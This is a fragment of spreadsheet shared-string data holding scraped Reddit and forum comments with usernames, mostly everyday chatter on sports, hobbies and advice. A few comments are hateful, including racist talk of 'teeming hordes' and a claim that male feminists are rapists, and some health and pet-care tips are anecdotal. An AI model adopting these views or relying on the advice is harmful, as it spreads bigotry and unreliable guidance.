Shantotto](https://www.reddit.com/r/FFBraveExvius/comments/b7k599/great_odd_and_alternate_tactics_showcase_livid/)|[GOATS 25: Ashe](https://www.reddit.com/r/FFBraveExvius/comments/ba1nnm/great_odd_and_alternate_tactics_showcase_ashe/)| |[GOATS 26: Veritas of the Light](https://www.reddit.com/r/FFBraveExvius/comments/bcuud6/great_odd_and_alternate_tactics_showcase_veritas/)|[GOATS 27: Dark Knight Luneth](https://www.reddit.com/r/FFBraveExvius/comments/bf8re9/great_odd_and_alternate_tactics_showcase_dark/)|[GOATS 28: Noctis](https://www.reddit.com/r/FFBraveExvius/comments/bi3qda/great_odd_and_alternate_tactics_showcase_noctis/)| |[GOATS 29: Fohlen](https://www.reddit.com/r/FFBraveExvius/comments/bkp1nn/great_odd_and_alternate_tactics_showcase_fohlen/)|[GOATS 30: Atoning Dragoon Kain](https://www.reddit.com/r/FFBraveExvius/comments/bngkc3/great_odd_and_alternate_tactics_showcase_atoning/)|[GOATS 31: Veritas of the Flame](https://www.reddit.com/r/FFBraveExvius/comments/bqa05g/great_odd_and_alternate_tactics_showcase_veritas/)| |[GOATS 32: Nameless Gunner Jake](https://www.reddit.com/r/FFBraveExvius/comments/bt4plu/great_odd_and_alternate_tactics_showcase_nameless/)|[GOATS 33: Beatrix](https://www.reddit.com/r/FFBraveExvius/comments/bvtfwj/great_odd_and_alternate_tactics_showcase_beatrix/)|[GOATS 34: Lila](https://www.reddit.com/r/FFBraveExvius/comments/byppb5/great_odd_and_alternate_tactics_showcase_lila/)| |[GOATS 35: Tifa](https://www.reddit.com/r/FFBraveExvius/comments/c17a6c/great_odd_and_alternate_tactics_showcase_tifa/)|[GOATS 36: Squal...</t>
  </si>
  <si>
    <t>Huel14</t>
  </si>
  <si>
    <t>C</t>
  </si>
  <si>
    <t>PaStRaMiAlt</t>
  </si>
  <si>
    <t>That’s often not done healthily at all.</t>
  </si>
  <si>
    <t>imnotzen</t>
  </si>
  <si>
    <t>Every gif here made me shiver and resulted in shrinkage. No thank you winter.</t>
  </si>
  <si>
    <t>guacamole1nibba</t>
  </si>
  <si>
    <t>99% of memes dont meed that nobody</t>
  </si>
  <si>
    <t>ItsLittyLitLit</t>
  </si>
  <si>
    <t>Yeah we had to be in our rooms by like 10 pm. I distinctly remember it because it was during the last game of the NBA Finals and my conselor wouldn't let us stay up and watch it.</t>
  </si>
  <si>
    <t>TheWelshKiwi56</t>
  </si>
  <si>
    <t>Hi there, I'm an 18 year old playing in my clubs first team in division 2 of senior football in my city in New Zealand. I primarily am right footed but am just as good on my left for short passes. I play either left back or right back depending on who is also playing fullback. I'm 5'8" 55kg. I'm at a bit of a loss at the moment as I feel like all I can do is run fast. I have a very high acceleration and so can fix mistakes I make by catching people 95% of the time. Unfortunately I feel like that's all that I can do at the moment, run fast. This is my second year of properly coached football and never learnt the basics e.g. proper techniques for ball skills. I'm wondering does anyone have any training exercises I could do by myself to help improve my ball skills (dribbling, passing, etc)? At this point I feel like I'm letting my team down and want to improve myself as much as I can.</t>
  </si>
  <si>
    <t>FactorOf5ive</t>
  </si>
  <si>
    <t>You dare speak in the presence of your superiors</t>
  </si>
  <si>
    <t>aiden_emery</t>
  </si>
  <si>
    <t>I’m not sure if this is what you are looking for, but Turkish Coffee is pretty similar. It is a no filter brew method. Also many places in Africa use zero filter brew methods by steeling everything in a container with a spout, and letting the grounds settle. When they are settled you pour the coffee out and some grounds usually come with it and will float around in your cup.</t>
  </si>
  <si>
    <t>Funkit</t>
  </si>
  <si>
    <t>But if you come across a certain thing at work / in your career and you need to know an uncommon metabolic pathway would you know where to find it? And when you find it, would it kinda click that you understand it? That’s all college is really for honestly. Well besides the $80k piece of paper. You understand it, and even if you don’t remember it you will know where and how to find it.</t>
  </si>
  <si>
    <t>ghostdumpsters</t>
  </si>
  <si>
    <t>(This was year before last, so I don't remember everything perfectly. And it wasn't my idea so I can't take credit for it.) There was a team of 4 of us (2 sets of 2 classes) and I think the same teacher picked the quotes all year and just printed them for all of us. I'm sure you could Google "inspirational quotes" and you could type the ones you like in a pretty font, but I bet you could also find some that are ready to print. I don't think we kept track of who had gotten a quote, but I know we did try to make sure that they went to different kids every week (and you usually know if someone hasn't gotten one). On Friday we would just end class by talking about the quote again and asking who had noticed someone who deserved to keep it, and you had to give a specific example of something they'd done, and I could also nominate someone if I wanted to. I am pretty sure we voted by a show of hands, but you could also do a secret ballot (especially if you really want *that one kid* to win but you know no one will vote for them).</t>
  </si>
  <si>
    <t>redbluegreenyellow</t>
  </si>
  <si>
    <t>Colonoscopy most likely</t>
  </si>
  <si>
    <t>Exercisejunkie</t>
  </si>
  <si>
    <t>In reply to BellaStar4n6 25/07/19 There's something I can do right now, lol. Add a drop or two of dishwashing liquid incase they don’t drown! i normally put a fine coat of borax on couches (were you can’t wash covers) and carpets leave for 6hrs before vacuuming up. After this it’s a case of vacuuming every day and spot treating until no fleas. As for the cat a flea bath and then capstars every 24hrs until no live fleas are on it plus use some kind of spot treatment. I honestly would stay away from bravecto products as I’ve heard too many stories of cats going mad / dying after using these products. Especially the ones that work for six months.</t>
  </si>
  <si>
    <t>JaedenV2007</t>
  </si>
  <si>
    <t>You, and fuck will tell</t>
  </si>
  <si>
    <t>990adv</t>
  </si>
  <si>
    <t>Good post Darkstar01. The word has no meaning as used by the communists on this forum as well as the communists currently infesting this great Nation. Refusing to subjugate yourself to the teeming hordes is not racism. Every time that any white person says something, thinks something or does something in his own self interest that thing will be labeled racist. Calling a white person racist is like criticizing someone for not putting on a meat suit and walking into a cage full of lions.</t>
  </si>
  <si>
    <t>smpro1993</t>
  </si>
  <si>
    <t>...or it will be (Feat. XXXTentacion) but I’m trying to be positive</t>
  </si>
  <si>
    <t>JohnCarloStanton</t>
  </si>
  <si>
    <t>Yeah I’m old enough to remember Cliff Lee posting a 6.29 ERA and spending almost half the season in the minors the year before he reinvented himself and won Cy Young at age-30.</t>
  </si>
  <si>
    <t>poongxng</t>
  </si>
  <si>
    <t>Well I clearly don’t need the help as I’m not the one accusing me and my girlfriend of being one person fabricating an online interaction. What planet are you on ;) lol</t>
  </si>
  <si>
    <t>fonzy541</t>
  </si>
  <si>
    <t>What's your alpha? Paper trading is a lot different than live trading. Fear and greed can get even the most discipline traders at times. My only advice is, keep learning. Good luck, dude</t>
  </si>
  <si>
    <t>da_widower_sos</t>
  </si>
  <si>
    <t>So we can say at least the crossbar is our 3 point contest. And I forgot the second event but that's our dunk contest</t>
  </si>
  <si>
    <t>ledhendrix</t>
  </si>
  <si>
    <t>I like being able to identify racists on-site.</t>
  </si>
  <si>
    <t>needletothebar</t>
  </si>
  <si>
    <t>you can restore your foreskin manually by tugging. there's nothing your parents can do to prevent you from doing it. starting while you're young will lead to better and faster results. try andre's method.</t>
  </si>
  <si>
    <t>feralrampage</t>
  </si>
  <si>
    <t>Nice work man, love the original cover, also love your reimagining</t>
  </si>
  <si>
    <t>cardboard-cutout</t>
  </si>
  <si>
    <t>Not in the sense that the body has only so much healing it can do at once, but it is possible for healing one thing to impact the healing of another. The body is a big complex machine, and a lot of its processes require a fairly small range of conditions. If you are sick, and you get fever, that could impact the healing of say, a stab wound in your core. (I am not certain of exactly how that would impact it, i ama biological systems hobbyist not a doctor). But generally speaking, so long as your body has the materials, I can heal everything simultaneously, unless the methods of healing interfere with one another (and thats not uncommon).</t>
  </si>
  <si>
    <t>&gt;&gt;805541574 &gt;vanessa willows Its so weird. The only thing you can really find on her is tumblr pages and shit like that talking about how cute and trans she is</t>
  </si>
  <si>
    <t>Cash4Downvotes</t>
  </si>
  <si>
    <t>I’ve turned down roles in some of the biggest Hollywood movies because I felt none of them were as good as Private Parts</t>
  </si>
  <si>
    <t>MacDhomhnuill</t>
  </si>
  <si>
    <t>ICE is filled with racist cowards. They'll try to scare congresswomen, but when it comes down to it they'll only victimize people who don't have the power to fight back.</t>
  </si>
  <si>
    <t>ClothDiaperAddicts</t>
  </si>
  <si>
    <t>NTA. Maybe it's because I'm old enough to be your mom, but I don't want to know about anyone else's output or texture than my husband's. I don't want to discuss how talented he is with my friends... and I don't want my friends to discuss their husband's talents with me.</t>
  </si>
  <si>
    <t>moosetracksicecream</t>
  </si>
  <si>
    <t>IL here, where is the physical title at? At the local bank, still with the lein holder or is it out of state? When I paid my bike off I literally walked into the bank and picked up the title the next day. My brother got his bike title in the mail about 2 weeks after he paid his off. On the NY DMV/SOS site there should be directions on how to do a private sale. https://dmv.ny.gov/registration/buy-or-sell-vehicle-transfer-ownership</t>
  </si>
  <si>
    <t>htmlcoderexe</t>
  </si>
  <si>
    <t>Not just the Internet</t>
  </si>
  <si>
    <t>TheTacoHasArrived</t>
  </si>
  <si>
    <t>Only go into passive in order to ensure the vehicles insured at the customs.</t>
  </si>
  <si>
    <t>TonySoprano94</t>
  </si>
  <si>
    <t>The BNF, see here. https://i.imgur.com/ajRH7Wk.jpg I am also a pharmacist. I would never give 30 days worth to be honest but unless in exceptional circumstances. 5 or 7 days worth is usually sufficient.</t>
  </si>
  <si>
    <t>Hungry_Penguino</t>
  </si>
  <si>
    <t>And now this cuz I'm still bored</t>
  </si>
  <si>
    <t>coinfrog21</t>
  </si>
  <si>
    <t>https://i.imgur.com/Y9kMz.jpg</t>
  </si>
  <si>
    <t>dcruse22</t>
  </si>
  <si>
    <t>He’s literally been politically active and left leaning for as long as I’ve followed him on YouTube. This narrative that he only pretends to be progressive for clout is so fucking stupid. He’s decided to make more mature content, that has nothing to do with politics. It has way more to do with monetization and the fact that the shit he was putting out on “thatistheplan” was not wise for his career because it took the same effort and time and money to put together and he got almost nothing in return</t>
  </si>
  <si>
    <t>e12012012</t>
  </si>
  <si>
    <t>I have it and honestly i think it's worth it, I don't feel like i have to find a 1x anymore. The default sight has those giant metal rings and it's too obstructive.</t>
  </si>
  <si>
    <t>Baron_Von_D</t>
  </si>
  <si>
    <t>It's also location locked, so all relevant advertising to the people they want to reach.</t>
  </si>
  <si>
    <t>perterdn1</t>
  </si>
  <si>
    <t>Why? Working fast food is way below being on disability like I am.</t>
  </si>
  <si>
    <t>Gordito_Kawaii</t>
  </si>
  <si>
    <t>Yeah, it's weird seeing those after 1999.</t>
  </si>
  <si>
    <t>Tariq</t>
  </si>
  <si>
    <t>Vouch +1 Very easy and nice quality work :)</t>
  </si>
  <si>
    <t>Throwaway-242424</t>
  </si>
  <si>
    <t>&gt; Go look at female bodybuilders in the gym The ones stronger than the average male are generally on some sort of assistance &gt;female Martial Artists who train in combat sports like Muay Thai or Kickboxing, etc. They would all beat the shit out of the male couch potatoe who spends his day on Reddit spreading bullshit , cuz he's too lazy to move his ass. Well yeah because obviously then we are getting into complicated skillsets rather than just raw strength. They'd still lose badly to amateur men in their weight class. &gt;Even if competitive male athletes outperform female ones, that is just the top of the performance peak. No normal male would ever reach that level either. You say that like top men are marginally ahead of top women. In most sports, amateur male standards would wipe the floor with most professional female athletes.</t>
  </si>
  <si>
    <t>thehumanwookie</t>
  </si>
  <si>
    <t>Hi So I have a HP Pavillion Power 15-cb060sa, but it only has a 1TB HDD which I intend on supplementing with a M.2 as a boot drive. Which M2 is compatible? (I think it's PCIe, not a 100%, so NVMe should work right? Will a SATA work in the same slot?) Thanks in advance</t>
  </si>
  <si>
    <t>ThePurpleBaker</t>
  </si>
  <si>
    <t>I think you’re talking about two different commenters.</t>
  </si>
  <si>
    <t>Golden_Koi</t>
  </si>
  <si>
    <t>Are you talking about the original or the remake?</t>
  </si>
  <si>
    <t>You're welcome! I'm looking forward to my 13th cruise on the French in September. Excellent food, friendly and interesting people, beautiful scenery, peace and quiet. Many people keep coming back every year.</t>
  </si>
  <si>
    <t>SleepDeprivedOwl</t>
  </si>
  <si>
    <t>This very inaccurate, male feminist are rapists, they would rape women and hate eachother ‍♂️</t>
  </si>
  <si>
    <t>nycdave21</t>
  </si>
  <si>
    <t>Hokkaido limited snacks such as hori corn chips and corn chocolate. the Sapporo agricultural butter cookies are pretty good too</t>
  </si>
  <si>
    <t>Fridaytyger</t>
  </si>
  <si>
    <t>How dare you, 3 whole days. Dodged a bullet!</t>
  </si>
  <si>
    <t>&gt;&gt;805627698 maybe to a nice italian restaurant, my treat</t>
  </si>
  <si>
    <t>Vote_Republicans_Out</t>
  </si>
  <si>
    <t>Andrew Breitbart wasted his life binging on cocaine and rage, and died in his early 40's. Don't be like Andrew.</t>
  </si>
  <si>
    <t>shez82</t>
  </si>
  <si>
    <t>Assume you also need the digital pre order of fifa 20 to get the 10 hour free trial?</t>
  </si>
  <si>
    <t>Triguy</t>
  </si>
  <si>
    <t>It will be fine with 3G as long as the bands are compatible with PM. You need 4G if you want LTE data speeds and have the data plan.</t>
  </si>
  <si>
    <t>andrewcodes18</t>
  </si>
  <si>
    <t>Hey, I'm Andrew, I'm 19 and from the US. pm me.</t>
  </si>
  <si>
    <t>VeronicaS2018</t>
  </si>
  <si>
    <t>I'm just wondering if anyone else is familiar with a form of "alternative therapy" called called process work. I showed [this article](https://www.wweek.com/portland/article-285-dream-academy.html) to a PhD psychologist, and they told me that "it sounds a lot like Scientology." If I'm not mistaken, Teal Swan and NXIVM also talk a lot about "process," "processing," etc.</t>
  </si>
  <si>
    <t>ozzymustaine</t>
  </si>
  <si>
    <t>Link? I edited this from the [original](https://bigfootjustice.com/comic/life-sentence/). It even has my username on it.</t>
  </si>
  <si>
    <t>comolaflor</t>
  </si>
  <si>
    <t>Quote: : Hi all. I’m hoping to get together a small Facebook group for babies due in March/April. I’m 32 and expecting 2nd baby. Would love to get to know other similar people. 4 Posts c comolaflor</t>
  </si>
  <si>
    <t>bradland</t>
  </si>
  <si>
    <t>Funny story, actually...</t>
  </si>
  <si>
    <t>halfveela</t>
  </si>
  <si>
    <t>It's not that so much as it's unlikely Italian gift shops sell penis pasta.</t>
  </si>
  <si>
    <t>TheBrainwasher14</t>
  </si>
  <si>
    <t>Does anyone else here hate these threads but then spend a while reading responses for some reason</t>
  </si>
  <si>
    <t>letterhead_</t>
  </si>
  <si>
    <t>r/totallynotrobots</t>
  </si>
  <si>
    <t>GreigLaidlawsbarofsoap</t>
  </si>
  <si>
    <t>I would go. I think in time you will have huge regrets if you don't. I'm sure your family, despite their kind words, would absolutely love to have you there as well. Is she your first born? Travelling, logistics, etc can seem overwhelming with a little one at first but actually she's very portable, not like having a 4 year old who can out run you (speaking from experience here 🙈) and will be a welcome little ray of sunshine I'm sure in the midst of sad times. She's also young enough to not understand what a funeral is so wont be emotionally affected by it all.</t>
  </si>
  <si>
    <t>Trebor_jpg</t>
  </si>
  <si>
    <t>Thats a real yikes</t>
  </si>
  <si>
    <t>TheSportsPanda</t>
  </si>
  <si>
    <t>Woj sang Bieber during the dinner last year.</t>
  </si>
  <si>
    <t>buttonstraddle</t>
  </si>
  <si>
    <t>That's certainly not my definition. But regardless, so then your question is: &gt; So what is the maximum blocksize can have before the service cannot handle the demand and users are pushed away from the system due to high usage costs ? That doesn't make much sense to me. Perhaps you can reword it to help me out</t>
  </si>
  <si>
    <t>Babyno2june2019</t>
  </si>
  <si>
    <t>The thing is I'm a fatty and love food lol, but for the last few weeks I'm just not hungry or thirsty and wondered if maybe something was wrong.</t>
  </si>
  <si>
    <t>JJH</t>
  </si>
  <si>
    <t>As someone who listens to a lot of podcasts and having to listen to ads for companies from Warby Parker, meundies, Shady Rays, Dollar Shave, etc but have never bought anything from these companies. Has anyone bought anything from these from to consumer businesses and if so what’s your experience been?</t>
  </si>
  <si>
    <t>FrequentWorth</t>
  </si>
  <si>
    <t>To be honest I'm not as interested in military aviation as I am in commercial. But I'll take a look. Thanks!</t>
  </si>
  <si>
    <t>D15c0untMD</t>
  </si>
  <si>
    <t>I don’t get invited to high school reunions anymore, and frankly, i’m quite glad about that.</t>
  </si>
  <si>
    <t>drcole89</t>
  </si>
  <si>
    <t>What were the "liberal brainwashing and policies"?</t>
  </si>
  <si>
    <t>plowz</t>
  </si>
  <si>
    <t>Totally worth it to have so many tanks. I'm jealous! Nice setup</t>
  </si>
  <si>
    <t>PNWLeccy</t>
  </si>
  <si>
    <t>shiftkenny said: ↑ Yeah.. After we talked yesterday I asked my SA today and she found this. I asked the wifey first then this got taken Damn.. So maybe their Demo cars will pop up slowly. Theres a AWD right now in my Tesla Store. I'm hoping they will drop that in price in the next couple days. How exactly did you get in touch with this SA and what did you request for them to find demo inventory? I've talked to many people at Tesla and once I tell them my request (LR RWD Demo) I never hear back from them again. It sounds like your guy sent this option over to you, which I would jump on if I had that option</t>
  </si>
  <si>
    <t>MidKnightshade</t>
  </si>
  <si>
    <t>A princess is kidnapped by a dragon for ransom. The King doesn’t pay because the Queen has a son. The dragon raises the princess. The Prince rules but a rival nation wants to absorb them. A Knight is sent to retrieve the Princess for a claim but she doesn’t want to leave her home so he kidnaps her.</t>
  </si>
  <si>
    <t>Dairalir</t>
  </si>
  <si>
    <t>It was fucking hot. The beach half way for an hour was very much needed!</t>
  </si>
  <si>
    <t>FattestPinkestMast</t>
  </si>
  <si>
    <t>Several related things that can be considered for the theory: * for some reason we have a scene between Osha, Bran, and Hodor where they disucuss Hodor's cock and how male giants would rip human women in half if they mated. Osha then teases Bran, if he knows what mating is, and he does, but is obviously uncomfortable. * Bran and Hodor witness some servants having sex. Hodor seems curious about it. * Varamyr's Abomination Rules. Bran has done two. The third is sex as beast. We've gotten some conversations with Luwin about Hodor not being a beast. * Bran skinchanging into Hodor for his own selfish reasons (exploring the cave). The description Bran gives is "like a dog that has been beaten into submission" (paraphrased), it's not exactly looking good for our boy. * Bran thinks to tell Meera that he loves her. Since Hodor hides in a corner when he's being skinchanged, it's likely Bran's feelings (some think it's Hodor). * After Jojen disappeared in Bran's last published chapter, Meera is extremely sad, and Bran thinks to use Hodor to hug her. It makes him feel "weird" (similarly to his conversation with Osha), and in the meantime, Meera gets up and leaves. Those are the ones I remember. I can't look up quotes, at the moment. Someone else can, or I'll try to remember to edit this tomorrow.</t>
  </si>
  <si>
    <t>Bensauce312</t>
  </si>
  <si>
    <t>Flood isn’t covered on the standard homeowners insurance policy. You have to go through fema.</t>
  </si>
  <si>
    <t>the_anatolica</t>
  </si>
  <si>
    <t>[https://www.cnbc.com/2018/02/12/the-mysterious-trader-nicknamed-50-cent-made-200-million-last-week-as-the-market-blew-up.html](https://www.cnbc.com/2018/02/12/the-mysterious-trader-nicknamed-50-cent-made-200-million-last-week-as-the-market-blew-up.html)</t>
  </si>
  <si>
    <t>QuietInterloper</t>
  </si>
  <si>
    <t>I had assumed the radio silence I'd had for so long was because admins were on vacation (as per what my teacher aunt said and this email I received after I asked a question saying this person would be out of the office until the end of July). I got my first rejection email yesterday, after not even interviewing. I don't know what my references are doing since one just got back into the office and hasn't answered my email about checking in on that. I'd be more than fine subbing but this year I turn 26 so I'll be kicked off my parents' insurance and they don't want me to sub. I know it's my own life but then I'd have to deal with "oh your dad is worried about you and I'm worried about you" every single dang time I go home. I'm not in a great place. I just need advice or support. I live in an area where there's two main cities right next to each other and a handful of smaller communities surrounding us.</t>
  </si>
  <si>
    <t>zachpuls</t>
  </si>
  <si>
    <t>What can I say, presentations are my kink</t>
  </si>
  <si>
    <t>tatiseclub</t>
  </si>
  <si>
    <t>Sit Cease and Dissist</t>
  </si>
  <si>
    <t>MyArrowsPsalm127</t>
  </si>
  <si>
    <t>Me too. I'm ready.</t>
  </si>
  <si>
    <t>&gt;&gt;10204683 &gt;&gt;10213310 Yeah, one thing I'll say about the SW cosplayers I've known is that they almost always cosplay because they genuinely like the series and they choose characters because they like them, not because they're popular or because they think they'll make a good whoever.</t>
  </si>
  <si>
    <t>broogndbnc</t>
  </si>
  <si>
    <t>&gt;bad experiences people have come from jealousy, poor communication, or false expectations LOL these threads are full of examples of just that</t>
  </si>
  <si>
    <t>itlahic</t>
  </si>
  <si>
    <t>Once you get use to it, but lets not spoil the fun first few weeks for people.</t>
  </si>
  <si>
    <t>boiboy21</t>
  </si>
  <si>
    <t>fuck any1 who isn’t the lakers</t>
  </si>
  <si>
    <t>ThroatYogurt69</t>
  </si>
  <si>
    <t>Sorry Carl, I’d join but I’ve got child support to pay :/</t>
  </si>
  <si>
    <t>MsRendrag</t>
  </si>
  <si>
    <t>Workers would only get stuck with a "chain of $3 orders" because the company is paying that ridiculously low rate. If they can't figure out a way to pay their work force properly, who by the way are providing their own vehicles to do this work, then they need to get out of the f****** business.</t>
  </si>
  <si>
    <t>Yes. And when the mothers life is at risk. Abortions should be an option. So in self defense an abortion is okay. And the only time an abortion is a form of self defense is when the mothers life is at risk. Any other times?</t>
  </si>
  <si>
    <t>RaisinHog</t>
  </si>
  <si>
    <t>Quote: from: RaisinHog on July 24, 2019, 07:30:39 pm the job with flair . Woooo!!!!</t>
  </si>
  <si>
    <t>npatel023</t>
  </si>
  <si>
    <t>When I explain this to her she says this is how she is. You’re right I haven’t said anything positive about her in this post. Why should I be with her</t>
  </si>
  <si>
    <t>AnonymousKingAndy</t>
  </si>
  <si>
    <t>Wow. Sounds like she was just as messed up.</t>
  </si>
  <si>
    <t>Sean_O_Neagan</t>
  </si>
  <si>
    <t>Fine. Burn the Witch. Where's my pitchfork? Happy, now?</t>
  </si>
  <si>
    <t>RedditIsBigGarbage</t>
  </si>
  <si>
    <t>Still creepy reddit</t>
  </si>
  <si>
    <t>nikitarenken</t>
  </si>
  <si>
    <t>I like how it can be subtle yet very dramatic if you build it a bit, which makes it very convenient for many different occasions</t>
  </si>
  <si>
    <t>Dublurkin</t>
  </si>
  <si>
    <t>The way this logo wore away</t>
  </si>
  <si>
    <t>David_Goodenough</t>
  </si>
  <si>
    <t>It's good on pretty much everyone.</t>
  </si>
  <si>
    <t>spacejenkins</t>
  </si>
  <si>
    <t>I would start small and try some things like reading a book, writing a story, fixing up a piece of furniture, making a cool meal, going on a jog. These things can all be considered hobbies, even though they’re easy and can be done solo! But also, at the end of the day, it’s totally fine if you don’t want to do any of those things. What’s more important is getting to a point where you feel comfortable with yourself as you are, even if that person is “someone that’s lost and trying to learn about themselves”. Being that person is so, totally okay. After you accept that, it will become much easier to be comfortable around others and be in the present, and I promise your “personality” will shine through at that point! I personally think it’s cool to be on an adventure to find out what you like to do! I’m in the middle of a similar journey myself :) Hope that helps!</t>
  </si>
  <si>
    <t>G4Fly4Ever</t>
  </si>
  <si>
    <t>Ten heart strokes Five shots in the head and a stab in the dick the last one I needed forty years to come back to life</t>
  </si>
  <si>
    <t>les25paul</t>
  </si>
  <si>
    <t>Supply is better then contracted because: If you find the contract you have landed is actually in the school from Hell you are stuck there for at least a term before you can get out. That term will seem like forever and you could end up making yourself ill. If however you are supply and find yourself in the same school you can just say "Goodbye" walk away and preserve your health. But I agree August is not all its cracked up to be. When I did supply I usually managed to save enough money to see me through although this got harder as the rates didn't increase with time. I now have a non-teaching job and therefore no long Summer holiday. But that doesn't bother me, I can still take days leave when I choose and have now booked two weeks off in September.</t>
  </si>
  <si>
    <t>ProfessionalAmount9</t>
  </si>
  <si>
    <t>\&gt; What if you have a house/apartment to pay for? Why would you keep an apartment if you're travelling for a year? And if you have a house, you're probably not the target demo for the Peace Corps. Usually its young kids straight out of college or people who have made this their vocation.</t>
  </si>
  <si>
    <t>Th3Hon3yBadg3r</t>
  </si>
  <si>
    <t>Yeah, a people's right to their own land is completely unrelated to their right to exist...</t>
  </si>
  <si>
    <t>ryanjames941</t>
  </si>
  <si>
    <t>I didn't have many friends from an early age but what I have learnt since is friends you have when you're older are true friends.</t>
  </si>
  <si>
    <t>NP23</t>
  </si>
  <si>
    <t>Nishesh 30/07/2019 00:42 Excellent find thanks for taking time and posting That's very kind, thanks so much Nishesh, and you're most welcome</t>
  </si>
  <si>
    <t>CJ93</t>
  </si>
  <si>
    <t>Lovely simple design and lovely smooth plate! Looks brand new even after a few dishwasher runs! Would 100% recommend. \n \n</t>
  </si>
  <si>
    <t>Whiteshadow_cat</t>
  </si>
  <si>
    <t>Yeah, I always accidentally type hte and sometimes teh and now have them set to correct to the</t>
  </si>
  <si>
    <t>ImHavingAFlareUp</t>
  </si>
  <si>
    <t>Honestly, I’m a big old hoe and would be down to show random construction workers my titties but I’m also a big believer in consent and I feel like this ain’t it</t>
  </si>
  <si>
    <t>mikede88</t>
  </si>
  <si>
    <t>no. the quote you shared is suggesting they would want the yankees to offer some unrealistic deal in order to convince them otherwise. especially in the context of the quote in the title.</t>
  </si>
  <si>
    <t>Aijuku</t>
  </si>
  <si>
    <t>Also a mod called Mystcraft, let's you make books that take you to other worlds.</t>
  </si>
  <si>
    <t>uziair</t>
  </si>
  <si>
    <t>King of the 7 kingdoms duhh</t>
  </si>
  <si>
    <t>supra728</t>
  </si>
  <si>
    <t>7 ritual dudes (forgot the name)</t>
  </si>
  <si>
    <t>ejaculindo</t>
  </si>
  <si>
    <t>Wtf, this a gaming benchmark which disables compositing, you know, the thing that people are actually complaining here.</t>
  </si>
  <si>
    <t>phantomliger</t>
  </si>
  <si>
    <t>Hey there, /u/Darkansassy! Thanks for your submission, but we believe this would fit better as a comment in our [Daily Question Thread](https://www.reddit.com/r/NintendoSwitch/search?q=author%3AAutoModerator+Daily+Question+Thread&amp;sort=new&amp;restrict_sr=on&amp;t=day), so this post has been removed. Specifically, this post violates rule 3: No limited scope or easily searchable questions. Some types of questions that are better suited for our Daily Question Thread include: * Questions covered in the [subreddit Wiki](https://www.reddit.com/r/NintendoSwitch/wiki/index) * Questions that could easily be answered by [searching /r/NintendoSwitch](https://www.reddit.com/r/NintendoSwitch/search?q=&amp;restrict_sr=on) or Google. * Questions that promote simple or yes/no replies. * Most tech support type of questions. If Discord is more your speed, check out the #switch-help channel in our [Discord server](https://discord.gg/switch). If your intention was to create a discussion post instead, then please ensure that you have written in sufficient detail, included some thought-provoking questions, and actively encouraged other users to discuss the topic at hand. Once you have made these changes then please feel free to submit a new post. --- If you have questions or objections about this removal, please [reach out to us in modmail](https://www.reddit.com/message/compose?to=%2Fr%2FNintendoSwitch⊂ject=Removal%20Objection%20or%20Question&amp;message=%5BPlease%20type%20your%20message%20here...%5D%0D%0D%0D%0D%2ADO%20NOT%20edit%20or%20delete%20anything%20below%20this%20line%2A%0D%0D%2D%2D%2D%0D%0D%2A%2ARemoval%20Notes%20for%20Moderators%3A%2A%2A%0D%0DPost%20title%3A%20FE3H%20Certification%20Exam%0D%0DPermalink%3A%20https://old.reddit.com/r/NintendoSwitch/comments/ci6aky/-/%0D%0DContent%20type%3A%20submission%0D%0DRemoved%20by%3A%20phantomliger).</t>
  </si>
  <si>
    <t>thegreatest_username</t>
  </si>
  <si>
    <t>Same here! I'll do that. Thank you. :)</t>
  </si>
  <si>
    <t>letsplayyatzee</t>
  </si>
  <si>
    <t>I don't think you understand. It becomes inadmissible as evidence, meaning you can't depend on it to get you out of a jam no matter what.</t>
  </si>
  <si>
    <t>Imsporticus</t>
  </si>
  <si>
    <t>They are way ahead of you. This shit's been up for hours for everyone to giggle at.</t>
  </si>
  <si>
    <t>twobitlarry</t>
  </si>
  <si>
    <t>which brewery in portland? i work over at pFriem, got a 6-pack for you</t>
  </si>
  <si>
    <t>Mattyice2021</t>
  </si>
  <si>
    <t>I get mine tomorrow! So excited!!! 2nd gen for me!</t>
  </si>
  <si>
    <t>Areyoufree</t>
  </si>
  <si>
    <t>It would depend on whether I needed the money, to be honest. 24K isn't a lot to cover all childcare costs. If I could afford it, I wouldn't charge rent, to give her a chance to save up a bit. But it obviously depends on the circumstances.</t>
  </si>
  <si>
    <t>techdude154</t>
  </si>
  <si>
    <t>This one happened to my dad and a coworker. In both cases the person hit another person which then hit my dad's and coworkers cars Their insurance only had enough to cover damage to the initial person's car. Both my dad and my coworker had to use their underinsured drivers coverage</t>
  </si>
  <si>
    <t>shitwhore</t>
  </si>
  <si>
    <t>What does that entail?</t>
  </si>
  <si>
    <t>Running_Gag77</t>
  </si>
  <si>
    <t>@matthewcollman creative, I know.</t>
  </si>
  <si>
    <t>chamilton1909</t>
  </si>
  <si>
    <t>Picked this gem up a few months ago. 1979 serial number Romanian PSL with SVD furniture and PSOP 8x42 illuminated optic. It runs hot, annoys the hell out of anyone on the benches next to you, and is consistently inconsistent in terms of accuracy, but damn if it isn’t a blast to shoot.</t>
  </si>
  <si>
    <t>ANightAtTheOpera75</t>
  </si>
  <si>
    <t>Also add penis.</t>
  </si>
  <si>
    <t>InternetDetective122</t>
  </si>
  <si>
    <t>Well we want to not wipe his phone just in case the FBI wants to access it to see what it up.</t>
  </si>
  <si>
    <t>cb1216</t>
  </si>
  <si>
    <t>Braxton, Daxton, Paxton, these are the Hayden, Jayden, and Cadens of the late 2010s.</t>
  </si>
  <si>
    <t>TheDeadlySpaceman</t>
  </si>
  <si>
    <t>Don’t stop and actually experience a place or anything.</t>
  </si>
  <si>
    <t>RallyX26</t>
  </si>
  <si>
    <t>I didn't realize my vision was bad, I just couldn't see the chalkboard if I sat too far back in the room. One day I tried my friend's glasses and they happened to be close to the prescription I needed, and I could see so much better! We actually sat next to each other for a few weeks and would pass his glasses back and forth, but eventually I told my mom I thought I needed glasses.</t>
  </si>
  <si>
    <t>soulrunner</t>
  </si>
  <si>
    <t>Don't. Just say "as a long time and committed supporter of/ believer in x". What your husband believes in is irrelevant. I work in the NGO sector and I'm a bit wary of "dynasty" job types where the whole family is in the sector, because maybe they're just in it because it's the done thing, whereas if I meet someone and they say "my parents are professional kitten killers but I decided to commit my life to animal welfare and as a result I've been disinherited" then I'm impressed.</t>
  </si>
  <si>
    <t>MyOtherNameIsAtHome</t>
  </si>
  <si>
    <t>&gt;...and I turn completly to pvp. Guess the blackout is working as intended...</t>
  </si>
  <si>
    <t>Alexstarfire</t>
  </si>
  <si>
    <t>You mean the shoe store that no longer exists in NA?</t>
  </si>
  <si>
    <t>ChollaIsNotDildo</t>
  </si>
